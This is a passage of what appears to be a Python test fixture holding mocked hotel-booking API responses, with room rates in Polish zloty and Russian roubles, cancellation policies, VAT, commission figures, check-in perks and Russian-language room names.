"payment_types": [
{
"amount": "231.90",
"show_amount": "231.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "38.65",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "231.90",
"amount_show": "231.90",
"commission_info": {
"show": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "47.00",
"show_price": "47.00",
"commission_info": {
"show": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "47.00",
"show_price": "47.00",
"commission_info": {
"show": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный полулюкс (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-e3a39df7-ff05-5e9d-a65c-9b3957b7ce27",
},
{
"daily_prices": ["231.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "231.90",
"show_amount": "231.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "38.65",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "231.90",
"amount_show": "231.90",
"commission_info": {
"show": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "47.00",
"show_price": "47.00",
"commission_info": {
"show": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "47.00",
"show_price": "47.00",
"commission_info": {
"show": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "47.00",
"amount_net": "47.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "232.00",
"amount_net": "231.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный полулюкс (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-5f35bd1d-2f03-593d-9287-8c579f7da8a9",
},
{
"daily_prices": ["238.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "238.90",
"show_amount": "238.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "39.82",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "238.90",
"amount_show": "238.90",
"commission_info": {
"show": {
"amount_gross": "238.90",
"amount_net": "238.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "238.90",
"amount_net": "238.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "10.20",
},
"perks": {
"early_checkin": [
{
"charge_price": "48.00",
"show_price": "48.00",
"commission_info": {
"show": {
"amount_gross": "48.00",
"amount_net": "48.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "48.00",
"amount_net": "48.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "48.00",
"show_price": "48.00",
"commission_info": {
"show": {
"amount_gross": "48.00",
"amount_net": "48.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "48.00",
"amount_net": "48.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "238.90",
"amount_net": "238.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "238.90",
"amount_net": "238.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Business (двуспальная кровать) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 117,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "52.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "204.99",
"currency_code": "PLN",
},
"book_hash": "h-fa54d921-ee14-5618-a175-adb6c944ba6b",
},
{
"daily_prices": ["269.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "269.90",
"show_amount": "269.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "44.98",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "269.90",
"amount_show": "269.90",
"commission_info": {
"show": {
"amount_gross": "270.00",
"amount_net": "269.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "270.00",
"amount_net": "269.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "54.00",
"show_price": "54.00",
"commission_info": {
"show": {
"amount_gross": "54.00",
"amount_net": "54.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "54.00",
"amount_net": "54.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "54.00",
"show_price": "54.00",
"commission_info": {
"show": {
"amount_gross": "54.00",
"amount_net": "54.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "54.00",
"amount_net": "54.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "270.00",
"amount_net": "269.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "270.00",
"amount_net": "269.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 5,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный люкс (двуспальная кровать)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-fe6b5ac8-f7eb-508f-bede-5fd572fd8c90",
},
{
"daily_prices": ["343.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "343.90",
"show_amount": "343.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "57.32",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "343.90",
"amount_show": "343.90",
"commission_info": {
"show": {
"amount_gross": "344.00",
"amount_net": "343.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "344.00",
"amount_net": "343.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "69.00",
"show_price": "69.00",
"commission_info": {
"show": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "69.00",
"show_price": "69.00",
"commission_info": {
"show": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "344.00",
"amount_net": "343.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "344.00",
"amount_net": "343.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 5,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный люкс Business (двуспальная кровать)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-34b2f31f-61e9-55a4-820d-401963dfe8be",
},
{
"daily_prices": ["344.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "344.90",
"show_amount": "344.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "57.48",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "344.90",
"amount_show": "344.90",
"commission_info": {
"show": {
"amount_gross": "344.90",
"amount_net": "344.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "344.90",
"amount_net": "344.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "14.73",
},
"perks": {
"early_checkin": [
{
"charge_price": "69.00",
"show_price": "69.00",
"commission_info": {
"show": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "69.00",
"show_price": "69.00",
"commission_info": {
"show": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "69.00",
"amount_net": "69.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "344.90",
"amount_net": "344.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "344.90",
"amount_net": "344.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"room_name": "Полулюкс",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 28,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "75.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "295.58",
"currency_code": "PLN",
},
"book_hash": "h-17278bae-1b55-5312-88dd-d33752e085a0",
},
{
"daily_prices": ["399.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "399.90",
"show_amount": "399.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "66.65",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "399.90",
"amount_show": "399.90",
"commission_info": {
"show": {
"amount_gross": "399.90",
"amount_net": "399.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "399.90",
"amount_net": "399.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "17.08",
},
"perks": {
"early_checkin": [
{
"charge_price": "80.00",
"show_price": "80.00",
"commission_info": {
"show": {
"amount_gross": "80.00",
"amount_net": "80.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "80.00",
"amount_net": "80.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "80.00",
"show_price": "80.00",
"commission_info": {
"show": {
"amount_gross": "80.00",
"amount_net": "80.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "80.00",
"amount_net": "80.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "399.90",
"amount_net": "399.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "399.90",
"amount_net": "399.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"room_name": "Номер Standard",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 9,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "87.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "343.24",
"currency_code": "PLN",
},
"book_hash": "h-6d8688f5-c3c6-5081-877c-ebf5eb80439b",
},
{
"daily_prices": ["418.90"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "418.90",
"show_amount": "418.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "69.82",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "418.90",
"amount_show": "418.90",
"commission_info": {
"show": {
"amount_gross": "419.00",
"amount_net": "418.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "419.00",
"amount_net": "418.90",
"amount_commission": "0.10",
},
},
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
"vat_data": {
"included": False,
"value": "0.00",
},
"perks": {
"early_checkin": [
{
"charge_price": "84.00",
"show_price": "84.00",
"commission_info": {
"show": {
"amount_gross": "84.00",
"amount_net": "84.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "84.00",
"amount_net": "84.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "84.00",
"show_price": "84.00",
"commission_info": {
"show": {
"amount_gross": "84.00",
"amount_net": "84.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "84.00",
"amount_net": "84.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "419.00",
"amount_net": "418.90",
"amount_commission": "0.10",
},
"charge": {
"amount_gross": "419.00",
"amount_net": "418.90",
"amount_commission": "0.10",
},
},
}
]
},
"rg_ext": {
"rg_class": 6,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместные апартаменты (двуспальная кровать) (1 комната)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"bar_rate_price_data": None,
"book_hash": "h-6399c583-f3fb-5af6-b5ac-fc6aa9e2d07e",
},
{
"daily_prices": ["510.90"],
"meal": "breakfast",
"payment_options": {
"payment_types": [
{
"amount": "510.90",
"show_amount": "510.90",
"currency_code": "PLN",
"show_currency_code": "PLN",
"by": None,
"is_need_credit_card_data": False,
"is_need_cvc": False,
"type": "deposit",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "85.15",
"currency_code": "PLN",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-03T21:00:00",
"amount_charge": "0.00",
"amount_show": "0.00",
"commission_info": {
"show": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "0.00",
"amount_net": "0.00",
"amount_commission": "0.00",
},
},
},
{
"start_at": "2020-08-03T21:00:00",
"end_at": None,
"amount_charge": "510.90",
"amount_show": "510.90",
"commission_info": {
"show": {
"amount_gross": "510.90",
"amount_net": "510.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "510.90",
"amount_net": "510.90",
"amount_commission": "0.00",
},
},
},
],
"free_cancellation_before": "2020-08-03T21:00:00",
},
"vat_data": {
"included": True,
"value": "21.82",
},
"perks": {
"early_checkin": [
{
"charge_price": "103.00",
"show_price": "103.00",
"commission_info": {
"show": {
"amount_gross": "103.00",
"amount_net": "103.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "103.00",
"amount_net": "103.00",
"amount_commission": "0.00",
},
},
"time": "10:00",
}
],
"late_checkout": [
{
"charge_price": "103.00",
"show_price": "103.00",
"commission_info": {
"show": {
"amount_gross": "103.00",
"amount_net": "103.00",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "103.00",
"amount_net": "103.00",
"amount_commission": "0.00",
},
},
"time": "15:00",
}
],
},
"commission_info": {
"show": {
"amount_gross": "510.90",
"amount_net": "510.90",
"amount_commission": "0.00",
},
"charge": {
"amount_gross": "510.90",
"amount_net": "510.90",
"amount_commission": "0.00",
},
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"room_name": "Номер Superior",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": 2,
"amenities_data": [
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": False,
"deposit": None,
"no_show": {
"amount": "112.00",
"currency_code": "USD",
"from_time": "12:00:00",
},
"bar_rate_price_data": {
"amount": "438.59",
"currency_code": "PLN",
},
"book_hash": "h-d4a635ef-65f6-58c4-a7a6-557f7e77e464",
},
],
"bar_price_data": {
"hotel": {"price": "123.96", "currency": "PLN"},
"room_groups": [
{
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"price": "123.96",
"currency": "PLN",
},
{
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"price": "171.62",
"currency": "PLN",
},
{
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"price": "204.99",
"currency": "PLN",
},
{
"rg_ext": {
"rg_class": 4,
"quality": 0,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"price": "295.58",
"currency": "PLN",
},
{
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"price": "343.24",
"currency": "PLN",
},
{
"rg_ext": {
"rg_class": 3,
"quality": 5,
"sex": 0,
"bathroom": 2,
"bedding": 0,
"family": 0,
"capacity": 0,
"club": 0,
},
"price": "438.59",
"currency": "PLN",
},
],
},
}
]
},
}
affiliate_hotel_page_response = {
"debug": {
"b2b_request": {
"checkin": "2020-08-05",
"checkout": "2020-08-06",
"currency": None,
"residency": "ru",
"timeout": None,
"language": "ru",
"guests": [{"adults": 1, "children": []}],
"id": "test_hotel",
},
"key_id": 2,
"validation_error": None,
},
"error": None,
"status": "ok",
"data": {
"hotels": [
{
"id": "test_hotel",
"rates": [
{
"daily_prices": ["2097.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "2097.00",
"show_amount": "2097.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "349.50",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "2097.00",
"amount_show": "2097.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Standard (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-50a6d4ca-fe41-583d-9da3-eb243e44956e",
},
{
"daily_prices": ["2097.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "2097.00",
"show_amount": "2097.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "349.50",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "2097.00",
"amount_show": "2097.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 2,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Standard (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-510d3f42-f0f7-5c0e-bc0e-bd8d67c48308",
},
{
"daily_prices": ["3468.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "3468.00",
"show_amount": "3468.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "578.00",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "3468.00",
"amount_show": "3468.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 3,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Business (двуспальная кровать) (двуспальная кровать king size, тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"double",
"non-smoking",
"private-bathroom",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-3a563874-dac9-5ee9-9f36-446811e43eff",
},
{
"daily_prices": ["3468.00"],
"meal": "breakfast-buffet",
"payment_options": {
"payment_types": [
{
"amount": "3468.00",
"show_amount": "3468.00",
"currency_code": "RUB",
"show_currency_code": "RUB",
"by": "credit_card",
"is_need_credit_card_data": True,
"is_need_cvc": True,
"type": "now",
"tax_data": {
"taxes": [
{
"name": "vat",
"included_by_supplier": True,
"amount": "578.00",
"currency_code": "RUB",
}
]
},
"cancellation_penalties": {
"policies": [
{
"start_at": None,
"end_at": "2020-08-04T20:59:00",
"amount_charge": "0.00",
"amount_show": "0.00",
},
{
"start_at": "2020-08-04T20:59:00",
"end_at": None,
"amount_charge": "3468.00",
"amount_show": "3468.00",
},
],
"free_cancellation_before": "2020-08-04T20:59:00",
},
}
]
},
"rg_ext": {
"rg_class": 3,
"quality": 4,
"sex": 0,
"bathroom": 2,
"bedding": 4,
"family": 0,
"capacity": 2,
"club": 0,
},
"room_name": "Двухместный номер Business (2 отдельные кровати) (тип кровати может измениться)",
"serp_filters": ["has_bathroom"],
"sell_price_limits": None,
"allotment": None,
"amenities_data": [
"non-smoking",
"private-bathroom",
"twin",
"window",
],
"any_residency": True,
"deposit": None,
"no_show": None,
"book_hash": "h-4ed9053d-92e3-5895-95fd-57b3eab8c02e",
},
{
"daily_prices": ["53.23"],
